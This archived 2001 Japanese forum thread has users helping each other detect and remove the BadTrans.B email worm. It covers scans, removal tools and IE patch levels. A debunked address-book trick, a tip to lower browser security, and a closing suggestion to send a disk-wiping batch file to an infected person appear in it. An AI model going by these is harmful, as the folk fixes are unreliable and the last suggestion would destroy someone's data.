 Windows95に対してはMicrosoftが既にサポートを停止して居り、Internet
 ExplorerのSecurity Hole防止策に悩んで居たところ、W32/AlizやW32/BadTrans
 のようなMass Mailer Worm(Outlook Expressのアドレス帳に侵入し、勝手に
 増殖・発信するタイプのウィールス)をダマクラかす方法を教えてくれた友人が
 居ます。本当に効けばメッケものにつき、お裾分け致します。尚、Internet
 ExplorerのVersion5.01SP/5.5SP/6.0をインストールしている場合
 には、メールを開いただけ(添付ファイルは開かなくとも)で感染・伝播する事
 はないそうです。
 1)アドレス帳に「!0000」なる「姓」だけを入力、メール・アドレスは空
 欄で登録。
 2)すると、このアドレスはアドレス帳のトップに登録される。
 3)ウィールスが侵入、自動的に再生・発信しようとする時、このアドレスに最
 初に取り付くのだが、「アドレス不全の為送信不能」となって、ウィールス・
 メールは「下書き」乃至は「送信トレイ」に入って止まってしまうので、そいつ
 を削除すれば、転送は防げる。
769ネット屋 ◆.t4dJfuU :01/12/10 07:47
>>768
そのウワサは私も聞きました。そこでエラーメッセージを出して止まると言う
話ですが、「Gonerで」と言う話で聞きました。ただ、確認のすべがないので、
ちょっと不明です。ネタだとすると、スパム化しそうで心配はしています。
ちなみに、windows95は昨年末でMSサポート打ち切り、IEのバージョンで
プレビューだけで感染しないのは、5SP2/5.5SP2/IE6標準以上です。
SP1ではだめなので、注意してください。
770 :01/12/10 07:54
>>710
先ほどシマンテックのオンラインスキャンで
「c:\WINDOWS\Temporary Internet Files\
Content.IE5\65GU0OZL\wbk3274.TMP は 次のウィルスに感染しています」:
[email protected]

あうう。
これはIEのキャッシュ?WEBから感染?IEは6を標準インストールしていたのに…
取りあえず指示通りこのファイルを削除。
もう1度オンラインスキャンする気力がなかったので
(60GBのHDDのせいかえらく時間が…)
チェックするフォルダの選べるトレンドマイクロの方ででwindowsフォルダ以下を
スキャンしたところ、一応感染なしとの御返事。
Badtrans_b@mmの説明にあるレジストリも見てみましたが、異常なし。

そもそもZoneAlarmが「sucatreg.exe」の外部へのアクセスを警告してきて
聞き覚えが無かったので取りあえずNO、検索して調べてみると
WINのシステムに元々あるファイルだがこの名前も使うウィルスもある…
位までしか分らなくて、気になってスキャンしてみたんですが。

シマンテックにはmm.encについては「製品を買うか該当ファイルを削除」以外の
情報が無いし、sucatreg.exeがそもそもネットにアクセスする事のある
ファイルなのかも分らず、どうもすっきりしない状態です。

メールをばら撒いたりしてなければ良いけど…忙しいのに参ったなあ
771ネット屋 ◆.t4dJfuU :01/12/10 07:56
>>762-764
ウィスルチェックを!で、もしもウィルスだった場合、ご報告をお願いします。
772ANN:01/12/10 08:05
既に2の21番の方が記述していましたが、その後レスが
ないようですので私も質問させてください。
夕べ「Re」の件名、本文なしのメール着信。プレビュー画面によると
本文なし。開いてしまいまいました。すると、自動的に(添付ファイルを
実行しなくとも、ウインドウズメディアプレイヤーが
起動、でも実行されず、エラー。
こちらはIE5.5のSP2.
オンラインウィルスチェック(トレンド・シマンテック両方とも)では
感染していないようです。
これは、
1 送られたものが不完全だった?
2 それとも、SP2で防御できた?
3 実は感染している?
気になります。
ご教示お願いします。
773ネット屋 ◆.t4dJfuU :01/12/10 08:16
>>770
「.tmp」が感染している分には削除でOKかと。
「sucatreg.exe」が添付されてきたわけではないのですよね?
元々Windowsに入っている「sucatreg.exe」はドライバの署名関係の
ファイルだと思います。BADTRANSが送られてきて、「sucatreg.exe」が
文句を言ったと言う報告はありませんが、ウィルスが何らかのドライバ
を組み込もうとしたのかな?なんだろ?mm.encに関しては確かに情報不足
なんすよ。う〜む。
774770:01/12/10 08:40
>>773
おお、どうも感謝です。
添付メールの方は、最近それらしい物は受け取っていません。
(ALIZは来ましたが、情報を聞いていたので正しく処置した…筈)

「sucatreg.exe」はドライバ署名…
そう言えば数日前にモニタを買い換えています(windowsはMe)が…

これ以上自力で調べるスキルがないので、様子を見つつ
情報を待つ事にします。どうも有難うございました。
775名称未設定:01/12/10 09:55
>763

それは只のスパムと思われ。

http://cheese.2ch.net/test/read.cgi/ihan/996639240/239/
http://pc.2ch.net/test/read.cgi/mac/997277437/364/
これでしょ??

うちには1ヶ月に2〜3通来る。(ここ1年ぐらい)
台湾だか中国だかのサイトの宣伝か何かじゃなかったかな。
DLさせようとする、ってのはうちではなかったです。
とにかくウザイ。

スレ違いなのでsage
776Becky! Ver2にて:01/12/10 10:13
「Re:」メールが来たんだけど、受信時にノートンがチェックしないので、定義アップデート。
んでBecky!の該当アカウントのフォルダをスキャンしてみたら、[email protected]
検疫して削除したら、受信メールが全部消えてしまった。鬱だ。
777ネット屋 ◆.t4dJfuU :01/12/10 10:16
>>772
感染していなかったとすると単なる予測ですが、MIMEエンコードを正常に解析し、正しいプログラム
である、メディアプレイヤーが起動され、再生すべきストリーム音声がむちゃくちゃなので、実行
エラーが出たと。と、すれば、ストリームに該当する部分に仕込まれていた、SP2が当たっていない
環境では、感染活動をするプログラムは動いていない、と言う結論でどうでしょうか?
>>768
>3)ウィールスが侵入、自動的に再生・発信しようとする時、このアドレスに最
>初に取り付くのだが、「アドレス不全の為送信不能」となって、ウィールス・
>メールは「下書き」乃至は「送信トレイ」に入って止まってしまうので、そいつ
>を削除すれば、転送は防げる。
自力でメール送信しますので『下書き』は存在せず『送信トレイ』にも入りません。
補足:
アドレス帳も使わないのでどんなアドレスを登録しておいても意味がない。
780ネット屋 ◆.t4dJfuU :01/12/10 10:46
>>779
BADTRANS.Bウィルスは、アドレス帳は見るっすよね?
781名無しさん@お腹いっぱい。:01/12/10 10:46
MS01-020 のセキュリティパッチが日本語ページからリンクが貼られている
ダウンロードページへの直リンクは
http://www.microsoft.com/windows/ie/downloads/critical/q290108/download.asp

あと別スレッドでも書いたけどIE(5.01 5.5 6.0)はMSから一応購入できる
(5.01,5.5がSPかどうかは確認できないけど)
値段は\1,050 アナログ回線の方や企業ユーザにはお勧めかな
http://web.msj.co.jp/shop/default.asp?
782名無しさん@お腹いっぱい。:01/12/10 10:49
知り合いがこのウイルスに感染したらしいのですが、数日後、
私の携帯メールに、以前その人に送った件名でRe:メールが来てて、
つい見てしまったら、htmlが表示されました。携帯でも
ヤバイですか?
>>780
>ワームは以下から取得したアドレスにメールを送信します:
>a.受信トレイにあるメールの送信者のアドレス
>b.「マイドキュメント」フォルダ及び「temporary Internet files」フォルダ内にある"*.HT*、"*.ASP"(「*」はワイルドカード)というファイル名のファイル内から取得できたメールアドレス
784ネット屋 ◆.t4dJfuU :01/12/10 11:00
>>783
ぬおっ、ホントだ。アドレス帳は見ないんだ!
ありがとうございました!
785ネット屋 ◆.t4dJfuU :01/12/10 11:03
>>782
やばくないっす。windowsと携帯電話両方に感染するウィルスは見つかってないと
思います。
786ネット屋 ◆.t4dJfuU :01/12/10 11:53
>>710
[email protected]」について調査中、ちと以前言っていた問題を
再確認しました。

-------------------------------------------------------
http://housecall.antivirus.com/housecall/start_jp.asp
では、検出できないウィルスが存在しる!
-------------------------------------------------------

当方に来たメールから、2通の病気と思しきメールを、Re_.emlのメールの
状態と、添付ファイルを保存したものの4種類、ディレクトリに保存、
両社のオンラインチェックをかけてみました。

File1. encRe_.eml 42,225Byte(便宜上、Re_.emlをencRe_emlにリネーム)
File2. Re_.eml 45,056Byte
File3. docs.D.pif 29,020Byte(File1.のメールの添付物)
File4. Me_nude.M.src 29,020Byte(File2.のメールの添付物)

トレンドマイクロでのチェック結果:
BASTRANS.B を検出:ファイルは「Me_nude.M.src」のみ。

シマンテックでのチェック結果:
C:\zzz\yyy\encRe_.eml は 次のウィルスに感染しています: [email protected]
C:\zzz\yyy\Re_.eml は 次のウィルスに感染しています: [email protected]
C:\zzz\yyy\docs.D.pif は 次のウィルスに感染しています: W32.Badtrans.B@mm
C:\zzz\yyy\Me_nude.M.scr は 次のウィルスに感染しています: W32.Badtrans.B@mm

おいおいおいおいおいおいおいおい、絶対にやばいってこれ!
トレンドマイクロにはメールで知らせましたが。

で、どうも「[email protected]」は展開される前、MIMEの状態の
病気と言うことではないかと思えるようになりました。いかがでしょうか?
引き続き両バイナリの差分を調査してみます。
787ネット屋 ◆.t4dJfuU :01/12/10 12:04
>>786
スーパーウルトラぶっとび!
2つの病気ファイルは全く同じ物!
んで、結論。なっなんと!「*.pif」ファイルは検索しないみたいだよ〜〜〜ん>トレンド。
もうね、あほかと、ばかかと。ウトゥ・・・
788ネット屋 ◆.t4dJfuU :01/12/10 12:09
>>787
連続カキコすまん。NT4AP6a+IE6での検査でした。
どなたか検証お願いします。感染しないようにしてね。
>>786 ネット屋さま
>「[email protected]」は展開される前、MIMEの状態
多分そうではないかと。
NC4.78のゴミ箱に入った状態で
C:\zzz\yyy\Trash は次のウィルスに感染しています: [email protected]
でしたので。

>>775 >>763 のスパム見てあわてて再チェックしたクチです(w
>>775 さんのレス見ていれば時間を無駄にしなくて済んだのに(鬱
790763:01/12/10 15:07
>775さん、ありがとうございます!DLしようとしたのは
台湾か韓国のフォント(?)だったのかもしれませんね。
キャンセルを押したら本文が表示されなかったので
ビビってしまいました。でもこれで安心できました。感謝します!

>771(ネット屋◆.t4dJfuU )さん、お騒がせしてしまってごめんなさい。
791763:01/12/10 15:11
>789さんも、慌てさせてしまってスミマセン・・・(;´Д`)ハンセイシマス
792名無しさん@お腹いっぱい。:01/12/10 15:22
>>790
その広告メールは、ギガバイトの台湾のサイト見に行ったら突然
来るようになった気がする。なんかメールアドレス抜かれるような
広告でも貼ってあったんだろうか。
793名無しさん@お腹いっぱい。:01/12/10 17:45
>>622です
ネット屋さんご親切に、いつも対処法を教えていただいてありがとうございます。
本当に、感謝ーっっ!です。
その後、言われる通りにしようとしたんですが、
「cookie食う?」とも聞かれませんでした。。。(x_x シュン・・・
¥temp¥は全て削除する勇気がなく、まだ一部残してるんですけど、
本当にきれいさっぱり削除してしまって大丈夫なんでしょうか?
今日は、風邪のウィルスに感染してしまったみたいで頭痛がしていて、
こっちのウィルスと戦う気力があまりありません。
又改めて質問させてもらってもいいでしょうか・・・?
勝手なお願いばかりでスミマセン。。。
794ネット屋 ◆.t4dJfuU :01/12/10 17:59
>>793
えっと>>621のとおりにやっても、「ActiveXがサポート外か有効になっていません」のメッセージ
なのでしょうか?どうなったのかを教えてください。
795名無しさん@お腹いっぱい。:01/12/10 18:38
793です。
ええ、設定は同じでした。
どこが悪いんだかさっぱり〜☆
教えてもらった通りの手順で試してみましたが上手くいきません。
しばらく「パソコンの設定をチェックします」とか表示されてから、
「・・・サポート外か有効に・・」というメッセージが出ます。
その後は又、同じ繰り返しで・・・。
一体どうしたものやら。。。
796ネット屋 ◆.t4dJfuU :01/12/10 20:04
>>795
ここまで来ると意地だな(w
1.ActiveXが有効になっていない。
シマンテック、トレンドマイクロ、どちらもJavaScriptとActiveXコントロールが動く必要があります。
ActiveXを有効にするには、下記の5.を参照してください。
http://security2.norton.com/ssc/faq.asp?j=1&langid=jp&venid=sym&plfid=22&pkj=TFTGVYRMHCGVRVRMNRY
2.Script処理が有効になっていない
Script処理を有効にするには、下記の7.を参照してください。
http://security2.norton.com/ssc/faq.asp?j=1&langid=jp&venid=sym&plfid=22&pkj=TFTGVYRMHCGVRVRMNRY
3.以前ダウンロードしたものが中途半端、若しくは壊れている
IEのツール→インターネットオプション→全般→インターネット一時ファイル
「Cookieの削除」 と 「ファイルの削除」をやってみてください。更に、
c:\windows\temp\*.*(厳密には%systemroot%\temp\*.*) を全部削除してください。
4.HDDの空き容量不足
少なくとも500M程度の空きが欲しいです。全部使ってしまうわけではありません、一時的に使用します。
また、空き容量が不足していると、メールの削除すらできませんよ。
5.IEのインストールが不完全
http://windowsupdate.microsoft.com/
で、「製品の更新」、をクリックし、「重要な更新」と「推奨する更新 」をやってみてください。
6.windowsが壊れている
デフラグとかスキャンディスクをしてみる。この辺りのレベルになると既にスレッド違い。
7.サイトが混雑している
今はとても混雑しています。再読み込みすると動き出すことがあります。
ウィルスのチェックは長くても2時間程度でしょうかね。
797名無しさん@お腹いっぱい。:01/12/10 21:46
うちもActiveXが有効にならなくて、やけになってセキュリティの設定を
"低"にしたら動きました。会社のPCでやったときは"中"で動いたのに。
謎でやんす・・・。
798772のANN:01/12/11 00:07
ネット屋さんへ。
朝の質問に対して早速の回答。ありがとうございます。
(大分お礼が送れました。)
799名無しさん@お腹いっぱい。:01/12/11 00:49
Windows Media Playerが勝手に開く件、追加情報。NIMDAの時のだけどね。
ソースはここ。

http://www.microsoft.com/JAPAN/technet/security/nimdaptch.asp
埋め込まれた readme.exe には audio/x-wav という MIME タイプが設定されています。
そのため、Windows Media Player 7.0 もしくは 7.1 がインストールされている環境では、
Media Player 自体が起動し、そのファイルを wav ファイル データとして再生しようとします。
そのため、readme.exe が実行されることはありません。Windows Media Player 6.4 では、
Media Player は起動せず、Internet Explorer から readme.exe が警告なしに実行されます。

これによると、Media Playerが開いたときはセーフって受け取れるけど、
実際そうなのかな。Media Player開いたけど感染したって言う人いる?
800名無しさん@お腹いっぱい。 :01/12/11 02:31
>ネット屋さん
どうやら感染したようです。
そこで、BADTRANS.Bについて色々調べましたら、

●受信トレイにある送信者に送る
●受信トレイの未読メールの送信者に送る

と二通り出てくるんですが、本当の所はどっちなんでしょうか?
>>800
未読に送信は、元々Aの特性だったような。。。
医者  「今度からは、かかる前に来てください」
看護婦「お大事に」
803KNQ:01/12/11 03:59
すいません、質問させてください。

シマンテックのセキュリティチェックにかけたら、
「1個のファイルが感染」とのことで、

c:\Windows\Application Data\Microsoft
\Outlook Express\Mail\削除済みアイテム.mbx
は 次のウィルスに感染しています:[email protected]

とでました。そこで、トレンドマイクロの
FIX_BADTRANS version 1.10を実行したのですが、
ログを見ると全部 not found で未感染状態です。

にもかかわらず、再度シマンテックのセキュリティチェック
にかけたら、やはり上記と同内容がでます。
1個のファイル感染したままです。
これは、どう対処すればよいのでしょう?

どうか、ご教示宜しくお願い致します。
804:01/12/11 04:12
もちろん再起動後に、セキュリティチェック
しました。
805九州男 ◆8U2HuhRg :01/12/11 04:46
>803

正確に言うなら感染してないから。
トレンドマイクロのワクチンは感染して実行可能な状態にある
exe他のファイルを削除するだけだから。

さっさと削除済みアイテムの中は綺麗にして
もう一回スキャンしてみましょう・・・
806名無しさん@お腹いっぱい。:01/12/11 04:48
>803
FIX_BADTRANS version 1.10で未感染状態なら感染していないのでしょう。
セキュリティチェックで出たのは、
ウイルスが添付されていたメールが削除済みアイテムフォルダに入っているからではないですか?
「削除済みアイテムフォルダを空にする」で完全削除すればいいのだと思いますよ。
狂牛病の判定会議とかこんな感じなんだろうか...
陽性?陰性?擬陽性?
808名無しさん@お腹いっぱい。:01/12/11 07:43
医学用語ですけど
病原体が体に入っただけの状態は「汚染」→何もなく排除される場合がある
病原体が体内で増殖を始めたら「感染」
症状が現れたら「発症」
です。

ワームの場合は増殖しないけど、システムフォルダにファイルを植え付けた時点が
「感染」で、テンポラリ等にいて「ファイルはあるが感染が成立していない状態」は
「汚染」と言った方が適切なような気がします。
まぁ余談ですけど
809ネット屋 ◆.t4dJfuU :01/12/11 08:11
>>799
なるほど。Web上での話ってここには書いてあるけど、メールでもプレイヤーが
起動したって人はいるよね?するとさ、今回のこの病気とかNimdaとかってIEと
かOEの問題と言うより、Windows Media Player 6.4の問題にならない?
IE5SP1とか5.5SP1でもMedia Player 7.0/7.1が入っていればセーフってことかな?
よくわからなくなってきちゃったなぁ。
>>800-801
うん、関連サイトの大意を見ると、BADTRANS.Bは未読以外のメールには送らない
ようですね。はっきりしたことは言えないけど。
>>803
病気の拡張子が「.pif」なんだと思います。その場合、トレンドのオンラ
インウィルスチェックでは発見できないようです。
しかし、最後の拡張子って「.scr」と「.pif」の2通りでしょ?
仮に確率1/2で名前を付けていたら、半分見つからないことにならんかな?
トレンドだと。
810名無しさん@お腹いっぱい。:01/12/11 08:19
>>776
俺もそうでした。
鬱ではないですが、不思議です。

そちらは感染してませんでしたか?
うちは大丈夫のようですが。
811ネット屋 ◆.t4dJfuU :01/12/11 08:27
>>776>>810
ひょっとしてBecky! Ver2って受信メールを全部一つのファイルにして
保存するのかな?MailBox方式だっけか?すると、一通感染しても、
その感染を含むファイルを消すと、全部の受信メールが消えそうな
気がするっす。推測だけど。
812名無しさん@お腹いっぱい。:01/12/11 08:44
>>811
Becky! Ver2は、MailBox方式なんですかね。
でもノートン先生は、ウィルスメール受信するたびにそれぞれ別のファイル名を挙げてくれましたが…。

自分も全部の受信メールが消えて鬱。
今アンチウィルスは2000をちまちまアップデートして使っているんですが、2002に買い換えるのが安全策でしょうか?
813KNQ :01/12/11 10:29
>>803 へのレス、皆様どうもありがとうございます。

>>805:九州男さん
>>806
いえ、それが削除済みアイテムフォルダはカラッポなのですよ。
受信フォルダから感染メール削除⇒
削除済みアイテムフォルダの(感染メールを含めた)メール全削除
を実行ずみです。

>>809 ネット屋さん
ということは、トレンドマイクロのFIX_BADTRANS version 1.10
では、駆除できないということなのでしょうか? その場合、対策としては
ネット屋さんが、>>1で紹介している、シマンテックの駆除ソフトの方で
駆除してみるということになりますでしょうか?
814ネット屋 ◆.t4dJfuU :01/12/11 10:47
>>813
なるほど。その可能性もありますね。トレンドマイクロの駆除ツールをかけた後、
シマンテックの駆除ツールを使ってみて、発見されたら大笑いなんですけど、
人柱になる気はありませんか?(微笑
815age:01/12/11 11:14
[email protected]
かかって来いや
816KNQ:01/12/11 11:47
>>814:ネット屋さん

今、やってみました。
W32.Badtrans.B@mm has not been found on your computer
だそうで、結局駆除されません・・・

一応、シマンテックのウィルス・チェッカーにまた
かけてみたのですが、やはり同じ結果です。(>>803

あとは、問題のファイル「削除済みアイテム.mbx」を直接削除
するか、Outlook express をアンインストールするしか
ないのでしょうか・・・

ウィルスの知識はほとんど無いのですが、ほうっておくと
大切なファイルが壊されたり、果てはパソコンがたちあがらなく
なったりするんですよね?
(また、勝手にウィルス・メールをばらまいたりとか・・・)

あるいは、トレンドマイクロのFIX_BADTRANS.B ver 1.10
の説明書によると、FIX_BADTRANS.B実行時に「免疫力」をつけますと
あるので、それに期待して、ほうっておいても「発病」しないの
でしょうか?

ぜび、御見解をお聞かせ下さい。
817ネット屋 ◆.t4dJfuU :01/12/11 11:57
>>816
すばらしい!ご協力感謝です。
続いてシマンテックの方のツールをかけることは出来ますか?
お気楽に答えていてすいません。今のその状態はほとんど問題は無いと考えます。
単にプレビューを禁止して削除済みトレイの中のメールを全て選択し、削除する
だけだと思うのですが、出来ましたらシマンテックのツールをやってみてください。
トレンドのツールを動かした後は、BADTRANS.Bには感染しなくなる(厳密には
発症しなくなる)と思います。
818KNQ:01/12/11 12:26
>単にプレビューを禁止して削除済みトレイの中のメールを全て選択し、
>削除するだけだと思うのですが、
>出来ましたらシマンテックのツールをやってみてください。

念の為、もう一度やってみたんですが、やっぱり(>>803)という
結果がでちゃうんです・・・また、>>813でも書いたように
削除済みトレイすでにカラッポなんです・・・
念の為、確認してみましたがやっぱりカラッポ・・・

>トレンドのツールを動かした後は、BADTRANS.Bには感染しなくなる
>(厳密には発症しなくなる)と思います。

不気味なのですが、感染しているとされている「削除済みアイテム.mbx」
ファイルは放置しておいても、大丈夫だろう(「発症」はしないだろう)
ということでしょうか?
819名無しさん@お腹いっぱい。:01/12/11 12:37
>>818
「ファイル」→「フォルダ」→「すべてのフォルダを最適化する」
でどう?
エントリだけ消して、実体は残ってるとおもわれ
820ネット屋 ◆.t4dJfuU :01/12/11 12:37
>>818
む。誤解していましたすいません。
IEのツール→オプション→メンテナンス→保存フォルダのボタンを押して
表示される場所は、
c:\Windows\Application Data\Microsoft\Outlook Express\Mail\
になってます?
そのWindowsって複数のユーザアカウントで使っていませんか?
若しくはHOTAMILなど、IMAP形式のメールアカウントもお持ちですか?
シマンテックのツールでも削除できなかったと言うことですね?
821宜しくお願いします:01/12/11 12:38
マカフィスレにも書き込みましたが、マイクロソフト社のアドバイスで検索
したところ、*.mtxというトロイの木馬型ウイルスに27個のファイルが感染
していると判明。アップデートしたマカフィでスキャンしたところ、21個の
感染ファイルが見つかり、駆除したのですが、その後で、また*.mtxで検索すると
27個のファイルが感染と出てきます。これはマカフィがスキャンしたものとは
別物のウイルスなのでしょうか?マカフィの最新バージョンでも駆除出来ないと
いうことでしょうか?どうしたらよいのか解らず、途方に暮れています。
駆除する方法をご教示下さい。
>>821
マカフィスレの人はなんて言ってた?

大体、ここで聞くってことは、感染ファイルはBadtransなんですよね?
そうではなかったらスレ違いなので、引き続きマカフィスレで聞いた
方がよいと思います。
823名無しさん@お腹いっぱい。:01/12/11 12:58
今日Reメールが来ました。
ファイル名SET UP.DOC.scrだったんですけど、明らかに怪しかったんで
ウィルスバスター2002でチェックしたけど検出なし、
普通なら?添付ファイルをダブルクリックするところだったんですが
なぜか、.scrを消して、ワードでひらいてしまった。
これでも、感染してしまうんですかね?
824カンタベリー物語:01/12/11 13:10
「好奇心が人を滅ぼす」
825ネット屋 ◆.t4dJfuU :01/12/11 13:12
>>823
たぶんしてないけど、とにかくチェック!
>>823
感染しているかをチェックして結果を報告してもらえるとありがたい。
827823:01/12/11 13:16
ネット屋さんありがとうございます。
石橋は叩き壊せということですね、
やります、やってやろうじゃないか。
828KNQ:01/12/11 13:16
解決しました!

>>819
そのようにしたら、シマンテック・ウィルスチェックで「感染0」
となりました! ありがとうございました。

>>820:ネット屋さん
何度もご丁寧なレス本当にありがとうございました。
なんか、してみるべき基本的な事をしていなかったようで、
そのため、大騒ぎの末、結局感染していなかったようです。
私の勉強不足のせいで、お手数お掛け致しました。

その他、ご助言くださった皆様、ほんとうにありがとうございました。
今、もう仕事に出かけなければならないのですが、
その前に解決できて、安心しました。
829ネット屋 ◆.t4dJfuU :01/12/11 13:44
>>827
へ?何か誤解されているような。ウィルスに感染しているかどうかのオンライン
ウィルスチェックをしてみてくださいと言う意味ですよ。
830823:01/12/11 14:15
以前Funloveの駆除で、丸一日かかったもので、今回もそれぐらいかかるのかなと
片方は2時間かかるという、記述もあったし、、、
自分にたいする、気合入れです。軽く流してください。

 そんなこと書くな! うん、ごもっとも、、、
>>826
結果報告は、夜遅くか、明朝になるかと。
831名無しさん@お腹いっぱい。:01/12/11 15:24
こういうウィルスってIE5.0 or 5.5SP2にすれば自動実行されなくなるっていう話だけど
わざわざSP2にしないでIE5.5 + 修正パッチ
みたいなことで回避はできるん?
>>831
できません。素直にSP2入れてくれ。
833名無しさん@お腹いっぱい。:01/12/11 16:00
>>832
あんまり容量つかいたくないしなー
どーにかならんもんか
>>831
このスレ頭から読んでいけば、どこかに該当パッチのURLが
ある。
自力で探してください。
835ナマケモノ@お腹いっぱい。 :01/12/11 16:24
>>834
めんどくさいなー
どーにかならんもんか
>>835
自力でなんとかしてください。
ちなみに、URLのリンク先は英語ページ。
がんばれや。
そもそも人に聞かんとできない
過去ログ探すのも面倒くさがる
そんなヤツはスキルもないし、姿勢もなってないので
相応しいやり方(sp2 or IE6)をやっといたら
>>837
はげどうです。
839名無しさん@お腹いっぱい。:01/12/11 18:38
OEのプレビューウィンドウを消しても、IEにSP2を当てなくては感染して
しまうんですよね?
既出だったらすみません。
840ken:01/12/11 18:39
お願いします。教えてください。
オンラインウィルス検索したのですが、
a:\RECYCLED\DA2.SCR というファイルが感染されている
そうなので削除するために探しているのですが、
a:\RECYCLED\DA2.SCR というファイル
はどのように検索しても見つけられません。
いったいどこにあるのでしょう?
またa:\RECYCLED\DA2.SCR を完全に削除
すれば解決するのでしょうか?
>>840
PC-98ですか?
ごみ箱を空にすればよいのでは?
842841:01/12/11 18:47
それからもういっぺんウイルスチェック、と。
843ネット屋 ◆.t4dJfuU :01/12/11 18:53
>>839
うまくやれば感染しません。プレビューの際、勝手に感染しちゃうと言う障害を
狙っているので。ただし、見たら最後です。
844839:01/12/11 19:04
>>843
憧れのネット屋さん、レスありがとうございました!
友人にウイルスが届いている可能性が非常に高くて、
なかなか送受信できないそうなんです。
『見ないように頑張れ』と伝えてきます。
845名無しさん@お腹いっぱい。:01/12/11 19:33
NortonAntiVirusで検疫したBadtransの中に、受信トレイ.mbx
(拡張子間違ってるかも)と削除済みトレイがあったが迷わず
永久削除。そうしてOutLookExpress4.0を開いたら受信トレイ内
が空になっていた。どうやら消してはいけないファイルを検疫し
ていたようで。。シマンテックのサイトには検疫したものはすべ
て削除と書いてあったのに。。。
846840:01/12/11 20:01
>841
PC98です。
つまりゴミ箱内に存在するのでしょうか?
>>846
a:\RECYCLED\ はごみ箱。
>845
828は読んだのかね。
849840:01/12/11 20:40
>847
a:\RECYCLED\ がゴミ箱だったとは(藁)。
問題解決です。ありがとうございました。
850845:01/12/11 20:50
828関連は、今読みました。でも手遅れです。
でも今回の問題は受信トレイが空になった事。
もう戻せないですよね。検疫しちゃったから削除しちゃったし。
IEの5.Xを使用。fix nimdaはすでにあり。
→ 感染?(件名Re;添付付きメール着。送信者名が文字化けしだした)
→ 感染の発想もないまま、IEを6.0に更新

今日ここを知り、2大サイトでチェックすると感染はなし。
でも、WINのスタートメニュから、
protocol.dll  cp_25389.nls  kernel32.exe を含むファイルを検索すると、
Windows temporary Internet filesに
1007344514[2] と w32 badtrans.b@mm[1] ありと検出。
トレンドマイクロの無料駆除ツールを使用したのに、
検索ではまだ上記ファイルが出てきます。

2つは削除すべきなのでしょうか。
また、自分は感染していたのでしょうか。
ひどい厨房ですみません。どうか教えて下さい。
852名無しさん@お腹いっぱい。:01/12/11 21:42
>>747
トレンドマイクロのオンラインスキャンが窓の手5.53を誤認識した可能性は?
>>851
検索したのは『内容にその文字列を含むファイル』(みたいな内容のやつ)でしょ?
これじゃ目的の物は見つからないっす。
『ファイル名』を探さないと。

1007344514[2] はこのスレ。
w32_badtrans.b@mm[1]はたぶんシマンテックの情報ページ。
どっちも消す必要はない。
854名無しさん@お腹いっぱい。:01/12/11 21:53
>>702
一応調べてみた、q231452 Update Available for "Legacy ActiveX Control" Issue
対象は3.0から4.01SP2まで 5.0で解決。
q240308 Update Available for Scriptlet.Typelib and Eyedog Security
Vulnerability and the BubbleBoy Virus
対象は4.0forNT4.0から5.0forWIN95まで 5.01で解決。
ということでそのブラウザはIE4.0SP1,q231452;q240308という事になるな。
今回のウイルスに対してはセキュリティー面で完全に無防備なんじゃない?
855 :01/12/11 22:01
モウコネ-ヨ!
つーわけで、沈静化したか?
856ネット屋 ◆.t4dJfuU :01/12/11 22:01
>>851
シマンテックの無料駆除ツールを使ってみたらどうでしょう?
>>852
今、窓の手5.53をDL,インストールしてトレンドオンラインをやってみましたが、
ひっかかりませんでしたよ。W2KSP2。
857ネット屋 ◆.t4dJfuU :01/12/11 22:08
>>853
すげー。ナイスっす。感動。
>>855
ええ、ほとんど鎮火したようですね。よかったです。
858776:01/12/11 22:10
>>810-812
Becky! Ver2なんですが、Inboxの中は***.bmfってファイルにまとまってました。
1つとは限らず、2〜3個に分かれてる場合もあります。受信メール数によるのかな。

こりゃ受信しちゃった後に消すとマズイですね。
受信時にブロックした時は、それだけ消してくれるんだけど・・・
859名無しさん@お腹いっぱい。:01/12/11 22:34
>>855
漏れは今日も来た…2通…
ここ2〜3日来てなかったから沈静化したと安心してたのに…
860851:01/12/11 22:52
>853、ネット屋さま
ありがとうございます。大ボケでお騒がせしました。
ファイル名検索は、kernel32.exeのフォルダだけ出て大丈夫そうです。
シマンテックも一応行こうと思います。
861800:01/12/11 22:56
>ネット屋さん

>うん、関連サイトの大意を見ると、BADTRANS.Bは未読以外のメールには送らない
>ようですね。はっきりしたことは言えないけど。

ありがとうございマス。
受信トレイには、何十人もの友達のメールがしまってありまして
受信トレイ−●●ちゃん
     −△△くん
と、フォルダ分けして保存していました。
全てのメールは既読でしたし、今のところ友達の被害報告は聞いていませんが
迷惑な話ですので、確認したかったのです。
801さんもおっしゃる様に、未読には送信=.Aもそうだったので
今回の.Bは、バージョンアップしたかと思い、びびってました。

トレンドマイクロでは、受信トレイにあるメールに送信するっぽい
内容でしたので???でしたが、ほっと一安心です。

ウイルスバスター2002買った方がいいかなと
検討中です。(W
862名無しさん@お腹いっぱい。:01/12/11 23:14
>>858
Becky! Ver2のMLでも話題になっているようですね。
http://b2search.tietew.net/archive/becky-ml/13749

ちなみに自分は*.bmf 17個ありました。メール数は250件くらいです。
どのタイミングで分割されるのかは不明。一番小さいファイルで9KB、
大きいものでは2000KBくらいありました。
添付ファイルはデコードされないまま本文と一緒に保存されるようです。

受信フォルダが壊れる対策としては、ウイルスソフトの設定を、受信時のチェック
有効にして、ファイルのスキャン対象からは*.bmfファイルを外す、という
方法が紹介されています。当然、感染メールが既に存在する場合はチェックが
かからず見逃されるわけですが、ウイルスが実行されて活動を始めるときには
拡張子が変わるので、ファイル処理時のスキャンで阻止されるため実害はないと
言うわけです。

Becky!2ユーザーのみなさん、正式な対応法が公開されるまでは、この方法を
試してみてはいかが?
(ウイルスバスターには"除外"の機能がないとう噂もあるようですが・・・)
863776:01/12/11 23:49
>>862
情報さんきゅーです。結構被害にあってる人いるんですね。
とりあえずは、受信しちゃったらゴミ箱に移してからスキャンすればいいかなと思ってます。
HTMLは表示しないようにしとけば、プレビューでやられることもないはずだし。
864名無しさん@お腹いっぱい。 :01/12/12 00:07
同じML内に感染者がいます。
しかし彼はどうせそのうちクリアインストールするからいい、と
放置の姿勢。自分からウイルスメールいったら削除してくれという構え。
ほっといていいんでしょーか??
865 :01/12/12 00:10
>>864
知人が他人に多大な迷惑をかけていることを知ってなお放置できるなら
ほうっておけばいい。
モラルのない知人を見捨てるのもモラルがないと思うが。
866名無しさん@お腹いっぱい。:01/12/12 00:10
>>864
徹底糾弾をすべき。
公害まき散らしの自覚がない人は公共の場にでる…てな。
悪質ならML缶に除名申請でもしたほうがいいかと。
867親切君:01/12/12 00:13
>>864
HDデリるバッチ、、、そいつから来たバドトランスメール
、、、、、、、て、、する。
